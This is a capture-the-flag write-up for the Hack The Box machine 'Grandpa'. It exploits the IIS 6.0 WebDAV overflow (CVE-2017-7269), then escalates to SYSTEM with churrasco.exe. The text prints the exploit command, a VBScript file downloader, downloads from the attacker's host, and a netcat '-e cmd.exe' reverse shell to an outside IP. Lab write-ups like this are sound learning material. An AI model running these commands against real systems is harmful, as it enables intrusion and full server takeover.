Grandpa is an easy Windows box. It can be exploited by properly enumerating the box and finding that it is running Microsoft IIS 6.0 and is vulnerable to a well known exploit: CVE-2017-7269 (WebDav). This is due to a buffer overflow in the ScStoragePathFromUrl function in the WebDAV service. This was abused and resulted in a shell as nt authority\network service. This shell was upgraded through token kidnapping with churrasco.exe to obtain a higher privileged shell.
Started off by running NmapAutomator.
Nmap discovered the following open ports and services:
PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 6.0
The automated nmap script discovered a very useful exploit with a rating of 10.0. This is the WebDav exploit. First, I browsed to the web page to get some more information:
I intercepted the request and saw that Microsoft IIS 6.0 is indeed running. This exploit was used to exploit Microsoft IIS 6.0 and obtain a reverse shell. The following command was executed:
python2.7 microsoft-iis6.py 10.129.101.72 80 10.10.14.147 9001
This provided a shell:
nc -nvlp 9001 listening on [any] 9001 ... connect to [10.10.14.147] from (UNKNOWN) [10.129.101.72] 1036 Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. c:\windows\system32\inetsrv>whoami whoami nt authority\network service
I mistakenly thought this was a system shell but then quickly realised I simply misread since I couldn’t access the admin’s desktop. I checked systeminfo:
C:\WINDOWS\Temp>systeminfo systeminfo Host Name: GRANPA OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition OS Version: 5.2.3790 Service Pack 2 Build 3790 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Uniprocessor Free Registered Owner: HTB Registered Organization: HTB Product ID: 69712-297-2947634-44968 Original Install Date: 4/12/2017, 5:07:40 PM System Up Time: 0 Days, 1 Hours, 12 Minutes, 25 Seconds System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: X86-based PC Processor(s): 1 Processor(s) Installed. : x86 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz BIOS Version: INTEL - 6040000 Windows Directory: C:\WINDOWS System Directory: C:\WINDOWS\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk Total Physical Memory: 1,023 MB Available Physical Memory: 796 MB Page File: Max Size: 2,470 MB Page File: Available: 2,328 MB Page File: In Use: 142 MB Page File Location(s): C:\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): 1 Hotfix(s) Installed. : Q147222 Network Card(s): N/A
This shows Windows Server 2003 and the architecture X86. When googling for this, I came across this very nice github page.. Now, you need to find a way to transfer the files. In these older systems, certutil and powershell are not available so you need to use something else. I always go for vbscript. This is really easy to setup. Copy and paste the following on the machine:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET", strURL, False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs
Now you can run the following command to download files from your host:
cscript /nologo wget.vbs http://10.10.14.147/churrasco.exe churrasco.exe
I also transffered over netcat:
cscript /nologo wget.vbs http://10.10.14.147/nc32.exe nc32.exe
Finally, to make use of this executable you can run the following command which will run as system:
churrasco.exe -d "C:\WINDOWS\Temp\nc32.exe -e cmd.exe 10.10.14.147 4444" /churrasco/-->Current User: NETWORK SERVICE /churrasco/-->Getting Rpcss PID ... /churrasco/-->Found Rpcss PID: 680 /churrasco/-->Searching for Rpcss threads ... /churrasco/-->Found Thread: 476 /churrasco/-->Thread not impersonating, looking for another thread... /churrasco/-->Found Thread: 684 /churrasco/-->Thread not impersonating, looking for another thread... /churrasco/-->Found Thread: 688 /churrasco/-->Thread not impersonating, looking for another thread... /churrasco/-->Found Thread: 700 /churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730 /churrasco/-->Getting SYSTEM token from Rpcss Service... /churrasco/-->Found NETWORK SERVICE Token /churrasco/-->Found LOCAL SERVICE Token /churrasco/-->Found SYSTEM token 0x728 /churrasco/-->Running command with SYSTEM Token... /churrasco/-->Done, command should have ran as SYSTEM! The command completed successfully.
If you setup a listener, this will provide you with a system shell.
This was a very simple box but useful nonetheless, I learned about churrasco executable and really like it so will definitely use this for future boxes too since it’s really easy to use. Hope you enjoyed this writeup!